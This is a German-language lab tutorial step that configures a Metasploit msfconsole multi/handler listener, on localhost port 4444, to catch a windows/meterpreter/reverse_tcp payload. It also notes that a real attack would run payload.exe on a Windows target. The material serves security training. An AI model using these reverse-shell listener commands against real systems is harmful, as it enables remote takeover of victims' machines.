Einen Listener in msfconsole erstellen, um die Verbindung abzufangen
In diesem Schritt richten Sie einen Listener ein, um die Verbindung von der gerade erstellten Payload zu verarbeiten. Eine Payload ist nutzlos, wenn Sie auf Ihrer Seite nichts haben, um die von ihr hergestellte Reverse-Verbindung "abzufangen". Hierfür verwenden wir msfconsole, die primäre Schnittstelle zum Metasploit Framework.
Starten Sie zuerst msfconsole. Die Verwendung des Flags -q bewirkt, dass es leise startet, ohne das Banner anzuzeigen, was übersichtlicher ist.
msfconsole -q
Ihr Prompt ändert sich zu msf6 >. Nun müssen Sie einen Handler konfigurieren, um auf die eingehende Verbindung zu lauschen. Die Einstellungen für den Handler müssen exakt mit den Einstellungen übereinstimmen, die Sie zur Generierung der Payload verwendet haben.
-
Verwenden Sie das Modul exploit/multi/handler. Dies ist ein generischer Handler für eingehende Verbindungen.
use exploit/multi/handler
-
Stellen Sie die Payload so ein, dass sie mit der von Ihnen generierten übereinstimmt.
set payload windows/meterpreter/reverse_tcp
-
Setzen Sie LHOST auf dieselbe IP-Adresse.
set LHOST 127.0.0.1
-
Setzen Sie LPORT auf denselben Port.
set LPORT 4444
-
Starten Sie schließlich den Listener.
run
msfconsole zeigt nun eine Meldung an, die angibt, dass der Listener gestartet wurde.
[*] Started reverse TCP handler on 127.0.0.1:4444
An diesem Punkt ist der Listener aktiv und wartet. In einem echten Angriff würden Sie payload.exe auf ein Windows-Ziel übertragen und ausführen. Wenn es ausgeführt wird, würde es sich mit diesem Listener verbinden, und Sie würden eine Meterpreter-Sitzung erhalten. Da wir in diesem Lab keine Ziel-Windows-Maschine haben, werden wir keine Verbindung sehen. Das Ziel hier ist es, den vollständigen Prozess der Payload-Generierung und der Einrichtung des entsprechenden Listeners zu lernen.
Um den Listener zu beenden, drücken Sie Strg + C. Um msfconsole zu beenden, geben Sie exit ein und drücken Sie Enter.
exit